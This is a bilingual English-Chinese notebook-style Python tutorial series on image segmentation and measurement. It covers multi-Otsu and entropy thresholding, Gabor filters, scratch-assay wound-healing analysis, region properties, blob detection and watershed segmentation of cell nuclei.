    (array([ 1503.,  4537.,  3200.,  4608.,  5865.,  7691.,  9625., 25963.,            0., 33377., 18666., 19131., 36722.,     0., 31707., 13031.,        10769.,  8827.,  6923.,  5264.,  7160.,  2595.,  1889.,  1722.,         1539.,  3244.,     0.,  4418.,  3113.,  4053., 11409.,     0.,        16772., 10292., 10680., 11360., 11665., 11160., 19404.,     0.,        14149.,  5101.,  3961.,  4908.,     0.,  2600.,   669.,   518.,          354.,   477.,   172.,   160.,   114.,   126.,   255.,     0.,          267.,   142.,   134.,    87.,   123.,   204.,    84.,   122.,           98.,   104.,   107.,   206.,     0.,   207.,   108.,   116.,          256.,     0.,   244.,   137.,   140.,   138.,   166.,   170.,          383.,   237.,   316.,   343.,   477.,  1422.,     0.,  2259.,         1469.,  1623.,  3926.,     0.,  4171.,  1900.,  1763.,  1432.,         1093.,   809.,  1017.,   603.]), array([100.  , 101.55, 103.1 , 104.65, 106.2 , 107.75, 109.3 , 110.85,        112.4 , 113.95, 115.5 , 117.05, 118.6 , 120.15, 121.7 , 123.25,        124.8 , 126.35, 127.9 , 129.45, 131.  , 132.55, 134.1 , 135.65,        137.2 , 138.75, 140.3 , 141.85, 143.4 , 144.95, 146.5 , 148.05,        149.6 , 151.15, 152.7 , 154.25, 155.8 , 157.35, 158.9 , 160.45,        162.  , 163.55, 165.1 , 166.65, 168.2 , 169.75, 171.3 , 172.85,        174.4 , 175.95, 177.5 , 179.05, 180.6 , 182.15, 183.7 , 185.25,        186.8 , 188.35, 189.9 , 191.45, 193.  , 194.55, 196.1 , 197.65,        199.2 , 200.75, 202.3 , 203.85, 205.4 , 206.95, 208.5 , 210.05,        211.6 , 213.15, 214.7 , 216.25, 217.8 , 219.35, 220.9 , 222.45,        224.  , 225.55, 227.1 , 228.65, 230.2 , 231.75, 233.3 , 234.85,        236.4 , 237.95, 239.5 , 241.05, 242.6 , 244.15, 245.7 , 247.25,        248.8 , 250.35, 251.9 , 253.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    MANUAL 手工阈值分割

• We can perform manual segmentation, but the automatic method works fine.
  • 可以手动分割,但自动方法效果也不错。
    region1 = (img >= 0) & (img <75)
    region2 = (img >= 75) & (img <140)
    region3 = (img >= 140) & (img <200)
    region4 = (img >= 200) & (img <=255)
    # Create 3 channel blank image of same size as original
    # 创建 3 通道空白图像,大小与原始图像相同
    all_regions = np.zeros((img.shape[0], img.shape[1], 3))
    all_regions[region1] = (1,0,0) # 红
    all_regions[region2] = (0,1,0) # 绿
    all_regions[region3] = (0,0,1) # 蓝
    all_regions[region4] = (1,1,0) # 黄
    all_regions
    array([[[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       ...,       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]]])
    plt.imshow(all_regions)
    <matplotlib.image.AxesImage at 0x16334046340>

    png

    AUTO 自动

    # Apply multi-Otsu threshold 
    thresholds = threshold_multiotsu(img, classes=4)
• Digitize (segment) original image into multiple classes.
  • 将原始图像数字化(分割)成多个类。
• np.digitize assigns values 0, 1, 2, 3, … to pixels in each class.
  • np.digitize 将值 0,1,2,3,… 赋给每个类中的像素。
    regions = np.digitize(img, bins=thresholds)
    plt.imshow(regions)
    <matplotlib.image.AxesImage at 0x163340a6a30>

    png

    segm1 = (regions == 0)
    segm2 = (regions == 1)
    segm3 = (regions == 2)
    segm4 = (regions == 3)

    OpenCV 图像处理之膨胀与腐蚀

• We can use binary opening and closing operations to clean up.
  • 我们可以使用二值开运算和闭运算来清理。
• Opening takes care of isolated pixels within the window.
  • 开运算负责处理窗口内的孤立像素。
• Closing takes care of isolated holes within the defined window.
  • 闭运算处理已定义窗口内的孤立孔洞。

    png

    from scipy import ndimage as nd

    segm1_opened = nd.binary_opening(segm1, np.ones((3,3)))
    segm1_closed = nd.binary_closing(segm1_opened, np.ones((3,3)))

    segm2_opened = nd.binary_opening(segm2, np.ones((3,3)))
    segm2_closed = nd.binary_closing(segm2_opened, np.ones((3,3)))

    segm3_opened = nd.binary_opening(segm3, np.ones((3,3)))
    segm3_closed = nd.binary_closing(segm3_opened, np.ones((3,3)))

    segm4_opened = nd.binary_opening(segm4, np.ones((3,3)))
    segm4_closed = nd.binary_closing(segm4_opened, np.ones((3,3)))

    all_segments_cleaned = np.zeros((img.shape[0], img.shape[1], 3))

    all_segments_cleaned[segm1_closed] = (1,0,0)
    all_segments_cleaned[segm2_closed] = (0,1,0)
    all_segments_cleaned[segm3_closed] = (0,0,1)
    all_segments_cleaned[segm4_closed] = (1,1,0)

    plt.imshow(all_segments_cleaned) # All the noise should be cleaned now
    <matplotlib.image.AxesImage at 0x1633505ba00>

    png

    Tutorial 53 - Using texture to segment images -demo in python

• Variance - expectation of the squared deviation of a random variable from its mean. Could be a good indicator of texture.

  • 方差——随机变量与其均值的平方偏差的期望。可能是纹理的良好指标。
• Entropy - quantifies disorder - a very good metric to quantify texture

  • 熵——量化无序程度——一个非常好的纹理度量

Gabor convolutional kernel - Gabor 卷积核

$$g(x,y,\lambda,\theta,\psi,\sigma,\gamma)=\exp\left(-\frac{x'^2+\gamma^2y'^2}{2\sigma^2}\right)\cos\left(2\pi\frac{x'}{\lambda}+\psi\right)$$

    其中:

$x'=x\cos(\theta)+y\sin(\theta)$

$y'=-x\sin(\theta)+y\cos(\theta)$
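To connect the formula to code, here is a minimal numpy sketch that evaluates $g(x,y)$ directly on a square grid (the function gabor_kernel and its grid construction are our own illustration, not part of the tutorial):

import numpy as np

def gabor_kernel(ksize, lam, theta, psi, sigma, gamma):
    # Evaluate g(x, y) on a ksize x ksize grid centered at the origin.
    half = ksize // 2
    y, x = np.mgrid[-half:half + 1, -half:half + 1]
    x_p = x * np.cos(theta) + y * np.sin(theta)    # x'
    y_p = -x * np.sin(theta) + y * np.cos(theta)   # y'
    envelope = np.exp(-(x_p ** 2 + gamma ** 2 * y_p ** 2) / (2 * sigma ** 2))  # Gaussian envelope
    carrier = np.cos(2 * np.pi * x_p / lam + psi)  # sinusoidal carrier
    return envelope * carrier

cv2.getGaborKernel, used below, builds the same kind of kernel from these parameters.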

    import matplotlib.pyplot as plt
    from skimage import io
    import numpy as np
    from skimage.filters import threshold_otsu
    import cv2
    img = io.imread("images/Scratch0.jpg", as_gray=True)
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x22ee31fc790>

    png

    • Variance - not a great way to quantify texture

      • 方差 -不是一个量化纹理的好方法
    from scipy import ndimage 

    k = 7
    img_mean = ndimage.uniform_filter(img, (k, k))
    img_sqr_mean = ndimage.uniform_filter(img ** 2, (k, k))
    img_var = img_sqr_mean - img_mean ** 2
    plt.imshow(img_var, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37a4d90>

    png

    论文阅读:Gabor Convolutional Networks_OopsZero 的博客-CSDN 博客_gabor 卷积

• GABOR - A great filter for texture, but usually only efficient if we know the exact parameters.

  • GABOR——一个很好的纹理滤波器,但通常只有在知道精确参数时才有效。
• Good choice for generating features for machine learning.

  • 为机器学习生成特征的好选择。
    ksize = 45
    theta = np.pi / 4
    kernel = cv2.getGaborKernel((ksize, ksize), 5.0, theta, 10.0, 0.9, 0, ktype=cv2.CV_32F)
    filtered_image = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(filtered_image, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37d7430>

    png

• Entropy: Entropy quantifies disorder.

  • 熵:熵量化无序。
• Since the cell region has high variation in pixel values, the entropy will be higher compared to the scratch region.

  • 由于细胞区域的像素值变化较大,熵值将高于划痕区域。
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(3))
    plt.imshow(entropy_img)
    <matplotlib.image.AxesImage at 0x22ee39d3d60>

    png

    • Scratch Analysis - single image

      • 划痕分析 -单幅图像
    • Now let us use otsu to threshold high vs low entropy regions.

      • 现在让我们用 otsu 来阈值高熵区和低熵区。
    plt.hist(entropy_img.flat, bins=100, range=(0,5))  #.flat returns the flattened numpy array (1D)
    (array([2.4906e+04, 0.0000e+00, 0.0000e+00, 0.0000e+00, 1.2640e+03,        4.0000e+00, 1.1000e+01, 3.4300e+02, 5.5700e+02, 1.0300e+02,        5.0000e+00, 6.8000e+02, 1.1500e+02, 3.4200e+02, 3.2900e+02,        3.1000e+02, 4.3700e+02, 1.9700e+02, 5.8100e+02, 1.6200e+02,        7.0100e+02, 1.4600e+02, 7.9900e+02, 2.1600e+02, 8.2000e+02,        4.6400e+02, 8.6300e+02, 6.2200e+02, 6.5100e+02, 7.2900e+02,        9.3500e+02, 1.0210e+03, 1.0650e+03, 1.1500e+03, 1.3230e+03,        1.5200e+03, 1.7200e+03, 1.9000e+03, 1.9490e+03, 2.6150e+03,        2.2130e+03, 3.0250e+03, 2.5620e+03, 3.1800e+03, 3.1780e+03,        3.2440e+03, 3.6230e+03, 3.3250e+03, 3.3660e+03, 3.5170e+03,        3.1100e+03, 3.3400e+03, 2.7800e+03, 2.6460e+03, 2.6750e+03,        2.0790e+03, 2.3660e+03, 1.8520e+03, 1.6350e+03, 1.5170e+03,        1.2040e+03, 1.1810e+03, 9.1000e+02, 8.3300e+02, 7.9300e+02,        6.5600e+02, 5.7100e+02, 4.1800e+02, 4.1400e+02, 3.6200e+02,        2.7300e+02, 2.2500e+02, 2.0900e+02, 1.8400e+02, 1.5600e+02,        1.0200e+02, 7.1000e+01, 5.7000e+01, 6.6000e+01, 3.2000e+01,        3.2000e+01, 2.0000e+01, 1.7000e+01, 5.0000e+00, 1.2000e+01,        2.0000e+00, 5.0000e+00, 2.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]), array([0.  , 0.05, 0.1 , 0.15, 0.2 , 0.25, 0.3 , 0.35, 0.4 , 0.45, 0.5 ,        0.55, 0.6 , 0.65, 0.7 , 0.75, 0.8 , 0.85, 0.9 , 0.95, 1.  , 1.05,        1.1 , 1.15, 1.2 , 1.25, 1.3 , 1.35, 1.4 , 1.45, 1.5 , 1.55, 1.6 ,        1.65, 1.7 , 1.75, 1.8 , 1.85, 1.9 , 1.95, 2.  , 2.05, 2.1 , 2.15,        2.2 , 2.25, 2.3 , 2.35, 2.4 , 2.45, 2.5 , 2.55, 2.6 , 2.65, 2.7 ,        2.75, 2.8 , 2.85, 2.9 , 2.95, 3.  , 3.05, 3.1 , 3.15, 3.2 , 3.25,        3.3 , 3.35, 3.4 , 3.45, 3.5 , 3.55, 3.6 , 3.65, 3.7 , 3.75, 3.8 ,        3.85, 3.9 , 3.95, 4.  , 4.05, 4.1 , 4.15, 4.2 , 4.25, 4.3 , 4.35,        4.4 , 4.45, 4.5 , 4.55, 4.6 , 4.65, 4.7 , 4.75, 4.8 , 4.85, 4.9 ,        4.95, 5.  ]), <BarContainer object of 100 artists>)

    png

    • Now let us binarize the entropy image
      • 现在我们把熵图像二值化
    thresh = threshold_otsu(entropy_img)
    thresh
    1.2953342370696572
    binary = entropy_img <= thresh
    plt.imshow(binary)
    <matplotlib.image.AxesImage at 0x22ee3ab2280>

    png

# Sum all pixels in the scratch region (values = 1)
scratch_area = np.sum(binary == 1)
print("Scratched area is: ", scratch_area, "square pixels")

scale = 0.45  # microns / pixel
print("Scratched area in sq. microns is: ", scratch_area * (scale ** 2), "square microns")
Scratched area is:  33485 square pixels
Scratched area in sq. microns is:  6780.712500000001 square microns

    Tutorial 54 - Scratch assay analysis in python by using texture for segmentation

What is scratch assay (wound healing) analysis?

• The wound healing assay is a standard technique for probing collective cell migration in two dimensions.
• A monolayer of cells is scratched with a pipette tip.
• The migration of cells into the gap is imaged over several hours using a microscope.
• The primary information derived is the rate of gap closure → a measure of the speed of the collective motion of the cells.

    png


• Scratch assay on time-series images.

import matplotlib.pyplot as plt
from skimage import io
from skimage.filters.rank import entropy
from skimage.morphology import disk
import numpy as np
from skimage.filters import threshold_otsu
• Use glob to extract the image names and load them.

import glob
time = 0
scale = 0.45  # microns / pixel
time_list = []
area_list = []
path = "images/scratch_assay/*.*"
• Put the code from the single-image segmentation into a for loop to apply the segmentation to all images.

for file in sorted(glob.glob(path)):  # sort so the frames are processed in time order
    img = io.imread(file)
    entropy_img = entropy(img, disk(3))
    thresh = threshold_otsu(entropy_img)
    binary = entropy_img <= thresh
    scratch_area = np.sum(binary == 1)
    scratch_area = scratch_area * (scale ** 2)  # convert from square pixels to square microns
    print("time=", time, "hr ", "Scratch area=", scratch_area, "um\N{SUPERSCRIPT TWO}")
    time_list.append(time)
    area_list.append(scratch_area)
    time += 1
time= 0 hr   Scratch area= 6768.765 um²
time= 1 hr   Scratch area= 5605.807500000001 um²
time= 2 hr   Scratch area= 4881.465 um²
time= 3 hr   Scratch area= 4277.4075 um²
time= 4 hr   Scratch area= 3742.4025 um²
time= 5 hr   Scratch area= 3261.2625000000003 um²
time= 6 hr   Scratch area= 2919.4425 um²
time= 7 hr   Scratch area= 2575.1925 um²
time= 8 hr   Scratch area= 2218.7925 um²
time= 9 hr   Scratch area= 1890.7425 um²
plt.plot(time_list, area_list, 'bo')  # blue-dot scatter plot
    [<matplotlib.lines.Line2D at 0x295b35d21c0>]

    png

• Print the slope and intercept of a linear fit to the area-vs-time data.
from scipy.stats import linregress  # linear regression

slope, intercept, r_value, p_value, std_err = linregress(time_list, area_list)
print("y = ", slope, "x", " + ", intercept)
print("R\N{SUPERSCRIPT TWO} = ", r_value ** 2)
y =  -507.25881818181824 x  +  6096.792681818182
R² =  0.9568904267126052

The magnitude of the slope, about 507 square microns per hour, is the gap-closure rate.

    Tutorial 55 - Image segmentation followed by measurements- in python

from skimage import measure, io, img_as_ubyte
import matplotlib.pyplot as plt
from skimage.color import label2rgb, rgb2gray
import numpy as np
import cv2
image = img_as_ubyte(rgb2gray(io.imread('images/cast_iron1.tif')))
scale = 0.6  # microns per pixel
plt.imshow(image, cmap='gray')
    <matplotlib.image.AxesImage at 0x200892d89a0>

    png

plt.hist(image.flat, bins=100, range=(0, 255))
    (array([    0.,    46.,   479.,  1449.,   966.,  1498.,  1081.,  1901.,         1408.,  2200.,  2605.,  1816.,  2434.,  1382.,  1474.,   686.,          719.,   387.,   439.,   275.,   322.,   311.,   195.,   347.,          197.,   305.,   191.,   297.,   193.,   303.,   315.,   169.,          300.,   173.,   331.,   239.,   344.,   234.,   409.,   271.,          467.,   435.,   337.,   569.,   420.,   744.,   545.,   906.,          747.,  1251.,  1509.,  1195.,  2163.,  1900.,  3508.,  3022.,         5913.,  5444., 11870., 11205., 25793., 40120., 29310., 32387.,         8740.,  1102.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

from skimage.filters import threshold_otsu
threshold = threshold_otsu(image)
threshold
    93
# Generate the thresholded image
thresholded_img = image < threshold
plt.imshow(thresholded_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089b28760>

    png

# Remove edge-touching regions
from skimage.segmentation import clear_border

edge_touching_removed = clear_border(thresholded_img)
plt.imshow(edge_touching_removed, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089c39ca0>

    png

• Label connected regions of an integer array using measure.label.
• Each connected entity is labeled as one object.
• Connectivity = the maximum number of orthogonal hops to consider a pixel/voxel as a neighbor.
• If None, full connectivity of input.ndim (the number of dimensions of the image) is used.
• For a 2D image that is 2.
label_image = measure.label(edge_touching_removed, connectivity=image.ndim)
plt.imshow(label_image)
    <matplotlib.image.AxesImage at 0x20089c9dbb0>

    png

• Return an RGB image where color-coded labels are painted over the image, using label2rgb.
image_label_overlay = label2rgb(label_image, image=image)
plt.imshow(image_label_overlay)
    <matplotlib.image.AxesImage at 0x20089d0a8e0>

    png

#################################################
# Calculate properties
# Using regionprops or regionprops_table
all_props = measure.regionprops(label_image, image)
# Can print various parameters for all objects
for prop in all_props:
    print('Label: {} Area: {}'.format(prop.label, prop.area))
• Compute image properties and return them as a pandas-compatible table.
• Available regionprops include: area, bbox, centroid, convex_area, coords, eccentricity, equivalent_diameter, euler_number, label, intensity_image, major_axis_length, max_intensity, mean_intensity, moments, orientation, perimeter, solidity, and many more.
props = measure.regionprops_table(label_image, image,
                                  properties=['label',
                                              'area', 'equivalent_diameter',
                                              'mean_intensity', 'solidity'])
import pandas as pd
df = pd.DataFrame(props)
df.head()
   label  area  equivalent_diameter  mean_intensity  solidity
0      1     1             1.128379       92.000000  1.000000
1      2   587            27.338464       19.701874  0.956026
2      3     1             1.128379       83.000000  1.000000
3      4    40             7.136496       64.625000  0.701754
4      5     1             1.128379       91.000000  1.000000
# To delete small regions...
df = df[df['area'] > 50]
df.head()
    label  area  equivalent_diameter  mean_intensity  solidity
1       2   587            27.338464       19.701874  0.956026
8       9   366            21.587165       32.696721  0.963158
11     12   226            16.963258       32.787611  0.945607
15     16    71             9.507892       49.253521  0.934211
16     17   220            16.736568       28.759091  0.897959

    Convert to micron scale

df['area_sq_microns'] = df['area'] * (scale ** 2)
df['equivalent_diameter_microns'] = df['equivalent_diameter'] * scale
df.head()
    label  area  equivalent_diameter  mean_intensity  solidity  area_sq_microns  equivalent_diameter_microns
1       2   587            27.338464       19.701874  0.956026           211.32                    16.403078
8       9   366            21.587165       32.696721  0.963158           131.76                    12.952299
11     12   226            16.963258       32.787611  0.945607            81.36                    10.177955
15     16    71             9.507892       49.253521  0.934211            25.56                     5.704735
16     17   220            16.736568       28.759091  0.897959            79.20                    10.041941
df.to_csv('data/cast_iron_measurements.csv')

    Tutorial 56 - Blob Detector for segmentation based on feature properties -in python-

blob_百度百科 (baidu.com)

In computer vision, a blob is a connected region in an image. Blob analysis takes the binary image produced by foreground/background separation, then extracts and labels its connected components. Each labeled blob represents one foreground target, whose features can then be computed. The advantage is that blob extraction yields information about each region of interest; the drawbacks are that it is relatively slow and the analysis can be difficult.

    https://www.learnopencv.com/blob-detection-using-opencv-python-c/

• BLOB stands for Binary Large OBject and refers to a group of connected pixels in a binary image.
• A blob is a group of connected pixels in an image that share some common property (e.g., grayscale value).
• In the image above, the dark connected regions are blobs, and the goal of blob detection is to identify and mark these regions.

    How it works:

• Thresholding: input images are converted to binary.
• Grouping: connected white/black pixels are grouped together.
• Merging: blobs located closer than minDistBetweenBlobs are merged.
• Center & radius calculation: the centers and radii of the new, merged blobs are computed and returned.

• Blobs can be filtered by color, size, or shape.

import matplotlib.pyplot as plt
import numpy as np
import cv2

image = cv2.imread('images/cast_iron1.tif', 0)  # read as grayscale
• Set up the SimpleBlobDetector with default parameters.

params = cv2.SimpleBlobDetector_Params()

• Define thresholds.

thresholdStep can also be defined; see the documentation.

params.minThreshold = 0
params.maxThreshold = 255

• Filter by area.

params.filterByArea = True
params.minArea = 50
params.maxArea = 10000

• Filter by color (black = 0).

params.filterByColor = False  # set to True for cast_iron, as we'll be detecting black regions
params.blobColor = 0
• Filter by circularity.

params.filterByCircularity = True
params.minCircularity = 0.5
params.maxCircularity = 1

• Filter by convexity.

params.filterByConvexity = True
params.minConvexity = 0.5
params.maxConvexity = 1

• Filter by inertia ratio.

params.filterByInertia = True
params.minInertiaRatio = 0
params.maxInertiaRatio = 1

• Minimum distance between blobs.

params.minDistBetweenBlobs = 0

• Set up the detector with the parameters.

detector = cv2.SimpleBlobDetector_create(params)

• Detect blobs.

keypoints = detector.detect(image)
print("Number of blobs detected are : ", len(keypoints))
    Number of blobs detected are :  82
• Draw blobs.

img_with_blobs = cv2.drawKeypoints(image, keypoints, np.array([]), (0, 0, 255),
                                   cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
plt.imshow(img_with_blobs)
    <matplotlib.image.AxesImage at 0x2b46aa494f0>

    png

    Tutorial 57 - Nuclei -cell- segmentation in python using watershed

What is watershed?

• Any grayscale image can be viewed as a topographic surface where high intensity denotes hills and low intensity denotes valleys.

    png

• With watershed, we start filling every valley with differently colored water (labels).
• As the water rises, water from different valleys will start to merge.
• To avoid that, we build barriers at the locations where the water merges.
• We continue filling water and building barriers until all the peaks are under water.
• The barriers give us the segmentation result.

    png

• To minimize over-segmentation due to noise in the image, OpenCV implements a marker-based watershed algorithm.
• We specify which valley points are to be merged and which are not.
• We first label the regions that we are sure of being the foreground (or object of interest) with one color.
• Then we label the regions that we are sure of being background or non-object with another color.
• Unsure regions in between are labeled with 0.
• This process creates the marker.
• Now apply the watershed algorithm.
• The marker will be updated with the labels we provided, and the boundaries of objects will have a value of -1 (a minimal sketch of this convention follows this list).
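
As a minimal sketch of this marker convention (my own illustration, assuming sure_fg, sure_bg and unknown are binary masks of certain foreground, certain background and ambiguous pixels, and img_bgr is the BGR image):

import cv2
import numpy as np

markers = np.zeros(img_bgr.shape[:2], dtype=np.int32)
markers[sure_bg > 0] = 1   # certain background: one positive label
markers[sure_fg > 0] = 2   # certain foreground: another positive label
markers[unknown > 0] = 0   # ambiguous pixels: watershed decides these

markers = cv2.watershed(img_bgr, markers)  # object boundaries come back as -1

The tutorial below builds the same kind of marker image, but uses connectedComponents so that every nucleus gets its own positive label instead of a single foreground label.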

    https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_imgproc/py_watershed/py_watershed.html


• This code performs cell counting and size-distribution analysis and dumps the results into a csv file.
• It uses watershed for better segmentation, separating touching nuclei.
import cv2
import numpy as np
from matplotlib import pyplot as plt
from scipy import ndimage
from skimage import measure, color, io
img = cv2.imread('images/Osteosarcoma_01.tif')
• Extract only the blue channel, as DAPI / nuclear (blue) staining is the best channel for performing the cell count.
• The blue channel alone is equivalent to a grey image.

cells = img[:, :, 0]  # OpenCV loads images as BGR, so channel 0 is blue
plt.imshow(cells, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b074850>

    png

• 1 pixel = 454 nm (from the metadata of the original image).

pixels_to_um = 0.454

STEP 1: Thresholded image for nuclei

• Threshold the image to binary using Otsu. All thresholded pixels will be set to 255.

ret1, thresh = cv2.threshold(cells, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
plt.imshow(thresh, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b181f10>

    png

• Morphological opening removes small noise.
• To remove holes we could use closing.

kernel = np.ones((3, 3), np.uint8)
opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=2)

from skimage.segmentation import clear_border
opening = clear_border(opening)  # remove edge-touching grains
plt.imshow(opening, cmap='gray')  # this is our image to be segmented further using watershed
    <matplotlib.image.AxesImage at 0x2b36bd0d6d0>

    png

• Check the total number of regions found before and after applying this.

STEP 2: Sure background

• Now we know that the regions at the centers of cells are for sure cells.
• The regions far away are background.
• We need to extract the sure regions; for that, erode a few times.
• But we have touching cells, so erosion alone will not work.
• To separate touching objects, the best approach is a distance transform followed by thresholding.
• Let us start by identifying the sure background area: dilating the mask a few times pushes the cell boundaries out into the background.
• This way, whatever remains outside is for sure background.
• The area in between the sure background and foreground is our ambiguous area.
• Watershed should find this area for us.
sure_bg = cv2.dilate(opening, kernel, iterations=10)
plt.imshow(sure_bg, cmap='gray')  # the dark region is our sure background
    <matplotlib.image.AxesImage at 0x2b36c5b2ac0>

    png

• Find the sure foreground area using a distance transform followed by thresholding: the intensity of each point inside a foreground region is changed to its distance from the closest 0-valued pixel (the boundary).

    https://www.tutorialspoint.com/opencv/opencv_distance_transformation.htm

dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)
plt.imshow(dist_transform, cmap='gray')  # distance-transformed image
    <matplotlib.image.AxesImage at 0x2b36bd55d00>

    png

• Let us threshold the distance transform, starting at 1/2 of its max value.

print(dist_transform.max())  # gives about 21.9
    21.968996
ret2, sure_fg = cv2.threshold(dist_transform, 0.5 * dist_transform.max(), 255, 0)
plt.imshow(sure_fg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36bdc25e0>

    png

    STEP 3: Unknown

• After experimenting you realize that 0.25 * max will not separate the cells well.
• A high value like 0.7 will miss some cells; 0.5 seems to be a good compromise.
• The unknown, ambiguous region is simply the sure background minus the sure foreground.
sure_fg = np.uint8(sure_fg)  # convert from float to uint8
unknown = cv2.subtract(sure_bg, sure_fg)
plt.imshow(unknown, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36be24c10>

    png

    STEP 4: Markers

• Now we create a marker and label the regions inside it.
• Sure regions, both foreground and background, are labeled with positive numbers.
• Unknown regions are labeled 0.
• For the markers, let us use connectedComponents.
• Connected-components labeling scans an image and groups its pixels into components based on pixel connectivity, i.e., all pixels in a connected component share similar pixel intensity values and are in some way connected to each other.
• Once all groups have been determined, each pixel is labeled with a graylevel or a color (color labeling) according to the component it was assigned to.
ret3, markers = cv2.connectedComponents(sure_fg)
plt.imshow(markers)
    <matplotlib.image.AxesImage at 0x2b36d8060a0>

    png

• One problem right now is that all background pixels are given the value 0.
• This means watershed would consider that region as unknown.
• So let us add 10 to all labels, so that the sure background is not 0 but 10.

markers = markers + 10
• Now, mark the unknown region with zero.

markers[unknown == 255] = 0
plt.imshow(markers, cmap='jet')  # note the 3 distinct kinds of regions
    <matplotlib.image.AxesImage at 0x2b36d8f51c0>

    png

• Now we are ready for watershed flooding.

markers = cv2.watershed(img, markers)
• Let us color the boundaries yellow.
• Remember that watershed assigns boundaries a value of -1.

img[markers == -1] = [0, 255, 255]  # yellow in BGR
• label2rgb - return an RGB image where color-coded labels are painted over the image.

img2 = color.label2rgb(markers, bg_label=0)
plt.imshow(img2)
    <matplotlib.image.AxesImage at 0x2b36d9c4970>

    png

plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2b36da2de50>

    png

• Now it is time to extract the properties of the detected cells.
• We capture the props directly into a pandas dataframe.
props = measure.regionprops_table(markers, cells,
                                  properties=['label',
                                              'area', 'equivalent_diameter',
                                              'mean_intensity', 'solidity', 'orientation',
                                              'perimeter'])

import pandas as pd
df = pd.DataFrame(props)
df.head()
   label     area  equivalent_diameter  mean_intensity  solidity  orientation     perimeter
0     10  1400327          1335.272149        4.860480  0.924828    -1.499676  18900.592991
1     11     1092            37.287767       80.092491  0.923858     1.282415    138.953319
2     12     1142            38.131871      151.830998  0.955649     0.670516    132.296465
3     13     1108            37.559944       78.256318  0.891392    -1.062275    146.852814
4     14     1670            46.111929      106.720359  0.862603     1.532047    188.823376
• To delete small regions...

df = df[df['area'] > 50]  # note: label 10 (the background region we created by adding 10) survives this filter
df.head()
   label     area  equivalent_diameter  mean_intensity  solidity  orientation     perimeter
0     10  1400327          1335.272149        4.860480  0.924828    -1.499676  18900.592991
1     11     1092            37.287767       80.092491  0.923858     1.282415    138.953319
2     12     1142            38.131871      151.830998  0.955649     0.670516    132.296465
3     13     1108            37.559944       78.256318  0.891392    -1.062275    146.852814
4     14     1670            46.111929      106.720359  0.862603     1.532047    188.823376
• Convert to micron scale.

df['area_sq_microns'] = df['area'] * (pixels_to_um ** 2)
df['equivalent_diameter_microns'] = df['equivalent_diameter'] * pixels_to_um
df.head()
   label     area  equivalent_diameter  mean_intensity  solidity  orientation     perimeter  area_sq_microns  equivalent_diameter_microns
0     10  1400327          1335.272149        4.860480  0.924828    -1.499676  18900.592991    288629.799932                   606.213556
1     11     1092            37.287767       80.092491  0.923858     1.282415    138.953319       225.078672                    16.928646
2     12     1142            38.131871      151.830998  0.955649     0.670516    132.296465       235.384472                    17.311869
3     13     1108            37.559944       78.256318  0.891392    -1.062275    146.852814       228.376528                    17.052215
4     14     1670            46.111929      106.720359  0.862603     1.532047    188.823376       344.213720                    20.934816

    Tutorial 58 - Object detection using template matching

Template Matching

    OpenCV: Template Matching

